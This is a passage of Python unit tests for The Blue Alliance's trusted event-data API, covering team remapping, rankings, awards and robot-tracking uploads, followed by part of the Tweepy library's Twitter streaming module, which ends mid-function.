self.assertEqual(set(Match.get_by_id('2014casj_sf1m1').youtube_videos), {'RpSgUrsghv4'})
def test_event_media_add(self):
self.video_auth.put()
event = Event(
id='2014casj',
event_type_enum=EventType.REGIONAL,
event_short='casj',
year=2014,
)
event.put()
videos = ['aFZy8iibMD0']
request_body = json.dumps(videos)
request_path = '/api/trusted/v1/event/2014casj/media/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_5', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
media_key = Media.render_key_name(MediaType.YOUTUBE_VIDEO, 'aFZy8iibMD0')
media = Media.get_by_id(media_key)
self.assertIsNotNone(media)
self.assertEqual(media.media_type_enum, MediaType.YOUTUBE_VIDEO)
self.assertEqual(media.foreign_key, 'aFZy8iibMD0')
self.assertIn(ndb.Key(Event, '2014casj'), media.references)
def test_update_event_info(self):
self.event_info_auth.put()
request = {
'first_event_code': 'abc123',
'playoff_type': PlayoffType.ROUND_ROBIN_6_TEAM,
'webcasts': [{'url': 'https://youtu.be/abc123'},
{'type': 'youtube', 'channel': 'cde456'}],
'remap_teams': {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
},
'someother': 'randomstuff', # This should be ignored
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
event = Event.get_by_id('2014casj')
self.assertEqual(event.first_code, 'abc123')
self.assertEqual(event.official, True)
self.assertEqual(event.playoff_type, PlayoffType.ROUND_ROBIN_6_TEAM)
webcasts = event.webcast
self.assertEqual(len(webcasts), 2)
webcast = webcasts[0]
self.assertEqual(webcast['type'], 'youtube')
self.assertEqual(webcast['channel'], 'abc123')
webcast = webcasts[1]
self.assertEqual(webcast['type'], 'youtube')
self.assertEqual(webcast['channel'], 'cde456')
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
# Test invalid remap_teams
request = {
'remap_teams': {
'frc9323': 'frc1323b', # lower case
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc9323': 'frc1323A', # "A" team
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc9323': 'frc1323BB', # Two letters
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc1323B': 'frc1323', # Mapping from B team
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'1323': 'frc1323B', # Bad starting format
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc1323': '1323B', # Bad ending format
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
def test_remapping(self):
self.event_info_auth.put()
self.matches_auth.put()
self.rankings_auth.put()
self.alliances_auth.put()
self.awards_auth.put()
request = {
'remap_teams': {
'frc1': 'frc101B',
'frc2': 'frc102B',
'frc3': 'frc102C',
'frc4': 'frc104'
},
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
# Test remapped matches
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
'dqs': ['frc1', 'frc2', 'frc3']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
request_path = '/api/trusted/v1/event/2014casj/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# verify remapped match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc101B'])
self.assertEqual(match.alliances['red']['dqs'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
self.assertEqual(set(match.team_key_names), set(['frc101B', 'frc102B', 'frc102C', 'frc104', 'frc5', 'frc6']))
# Test remapped alliances
alliances = [['frc1', 'frc2', 'frc3'],
['frc4', 'frc5', 'frc6'],
['frc7', 'frc8', 'frc9']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped rankings
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc1', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc2', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc3', 'rank': 3, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc4', 'rank': 4, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc5', 'rank': 5, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc6', 'rank': 6, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# verify remapped alliances
self.assertEqual(len(self.event.alliance_selections), 3)
self.assertEqual(self.event.alliance_selections[0]['picks'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(self.event.alliance_selections[1]['picks'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(self.event.alliance_selections[2]['picks'], ['frc7', 'frc8', 'frc9'])
# verify remapped rankings
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '101B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[2], [2, '102B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[3], [3, '102C', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[4], [4, '104', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[5], [5, '5', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[6], [6, '6', 20, 500, 500, 200, '10-0-0', 0, 10])
# Test remapped awards
awards = [{'name_str': 'Winner', 'team_key': 'frc1'},
{'name_str': 'Winner', 'team_key': 'frc2'},
{'name_str': 'Winner', 'team_key': 'frc3'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc4', 'awardee': 'Bob Bobby'},
{'name_str': 'Chairman\'s Blahblah', 'team_key': 'frc5'},
{'name_str': 'Finalist', 'team_key': 'frc6'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
for team in Award.get_by_id('2014casj_1').recipient_dict.keys():
self.assertTrue(str(team) in {'101B', '102B', '102C'})
for team in Award.get_by_id('2014casj_5').recipient_dict.keys():
self.assertTrue(str(team) in {'104'})
for team in Award.get_by_id('2014casj_0').recipient_dict.keys():
self.assertTrue(str(team) in {'5'})
for team in Award.get_by_id('2014casj_2').recipient_dict.keys():
self.assertTrue(str(team) in {'6'})
def test_remapping_after(self):
self.event_info_auth.put()
self.matches_auth.put()
self.rankings_auth.put()
self.alliances_auth.put()
self.awards_auth.put()
# Test remapped matches
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
'dqs': ['frc1', 'frc2', 'frc3']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
request_path = '/api/trusted/v1/event/2014casj/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped alliances
alliances = [['frc1', 'frc2', 'frc3'],
['frc4', 'frc5', 'frc6'],
['frc7', 'frc8', 'frc9']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped rankings
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc1', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc2', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc3', 'rank': 3, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc4', 'rank': 4, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc5', 'rank': 5, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc6', 'rank': 6, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped awards
awards = [{'name_str': 'Winner', 'team_key': 'frc1'},
{'name_str': 'Winner', 'team_key': 'frc2'},
{'name_str': 'Winner', 'team_key': 'frc3'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc4', 'awardee': 'Bob Bobby'},
{'name_str': 'Chairman\'s Blahblah', 'team_key': 'frc5'},
{'name_str': 'Finalist', 'team_key': 'frc6'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Set remapping
request = {
'remap_teams': {
'frc1': 'frc101B',
'frc2': 'frc102B',
'frc3': 'frc102C',
'frc4': 'frc104'
},
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
# Run tasks
tasks = self.taskqueue_stub.GetTasks('admin')
for task in tasks:
self.cronapp.get(task["url"])
# verify remapped match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc101B'])
self.assertEqual(match.alliances['red']['dqs'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
self.assertEqual(set(match.team_key_names), set(['frc101B', 'frc102B', 'frc102C', 'frc104', 'frc5', 'frc6']))
# verify remapped alliances
self.assertEqual(len(self.event.alliance_selections), 3)
self.assertEqual(self.event.alliance_selections[0]['picks'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(self.event.alliance_selections[1]['picks'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(self.event.alliance_selections[2]['picks'], ['frc7', 'frc8', 'frc9'])
# verify remapped rankings
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '101B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[2], [2, '102B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[3], [3, '102C', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[4], [4, '104', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[5], [5, '5', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[6], [6, '6', 20, 500, 500, 200, '10-0-0', 0, 10])
# verify remapped awards
for team in Award.get_by_id('2014casj_1').recipient_dict.keys():
self.assertTrue(str(team) in {'101B', '102B', '102C'})
for team in Award.get_by_id('2014casj_5').recipient_dict.keys():
self.assertTrue(str(team) in {'104'})
for team in Award.get_by_id('2014casj_0').recipient_dict.keys():
self.assertTrue(str(team) in {'5'})
for team in Award.get_by_id('2014casj_2').recipient_dict.keys():
self.assertTrue(str(team) in {'6'})
def test_zebra_motionworks_add(self):
self.event_zebra_motionworks.put()
match1 = Match(
id="2014casj_qm1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc1", "frc2", "frc3"]}, "red": {"score": -1, "teams": ["frc254", "frc971", "frc604"]}}""",
comp_level="qm",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc254', u'frc971', u'frc604', u'frc1', u'frc2', u'frc3'],
youtube_videos=["abcdef"]
)
data = [{
"key": "2014casj_qm1",
"times": [0.0, 0.5, 1.0, 1.5],
"alliances": {
"red": [
{
"team_key": "frc254",
"xs": [None, 1.2, 1.3, 1.4],
"ys": [None, 0.1, 0.1, 0.1],
},
{
"team_key": "frc971",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
{
"team_key": "frc604",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
],
"blue": [
{
"team_key": "frc1",
"xs": [None, 1.2, 1.3, 1.4],
"ys": [None, 0.1, 0.1, 0.1],
},
{
"team_key": "frc2",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
{
"team_key": "frc3",
"xs": [1.1, 1.2, None, 1.4],
"ys": [0.1, 0.1, None, 0.1],
},
],
}
}]
# Verify failure if Match doesn't exist
request_body = json.dumps(data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Add match
match1.put()
# Verify bad event_key doesn't get added
bad_data = copy.deepcopy(data)
bad_data[0]['key'] = '2019casj_qm1'
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify malformatted data doesn't get added
bad_data = copy.deepcopy(data)
del bad_data[0]['times'][0]
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify teams must be the same
bad_data = copy.deepcopy(data)
bad_data[0]['alliances']['red'][0]['team_key'] = 'frc9999'
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify correctly added data
request_body = json.dumps(data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(ZebraMotionWorks.get_by_id('2014casj_qm1').data, data[0])
|
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import re
import requests
import sys
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
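# Illustrative only -- a minimal sketch of a StreamListener subclass showing the
# callback contract that Stream relies on (the class name is hypothetical):
#
#   class PrintListener(StreamListener):
#       def on_status(self, status):
#           print(status.text)          # handle each parsed Status
#       def on_error(self, status_code):
#           return status_code != 420   # returning False stops the stream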
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
until enough data is returned. On some systems (eg google appengine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
    For low throughput systems we don't want to sacrifice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size, encoding='utf-8'):
self._stream = stream
self._buffer = six.b('')
self._chunk_size = chunk_size
self._encoding = encoding
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
return six.b('')
def read_line(self, sep=six.b('\n')):
"""Read the data stream until a given separator is found (default \n)
        :param sep: Separator to read until. Must be of the bytes type (str in python 2,
bytes in python 3)
:return: The str of the data read until sep
"""
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
return six.b('')
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r.decode(self._encoding)
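# Illustrative only -- how Stream._read_loop below drives ReadBuffer (the local
# names other than ReadBuffer are hypothetical):
#
#   buf = ReadBuffer(resp.raw, chunk_size=512)
#   line = buf.read_line()                   # read up to the next b'\n'
#   if line.strip().isdigit():
#       payload = buf.read_len(int(line))    # read exactly that many bytes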
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
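        # With the defaults above, HTTP errors back off 5s, 10s, 20s, ... capped
        # at 320s (420 responses start at 60s), and timeouts snooze in 0.25s
        # steps up to 16s before reconnecting.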
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exc_info = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
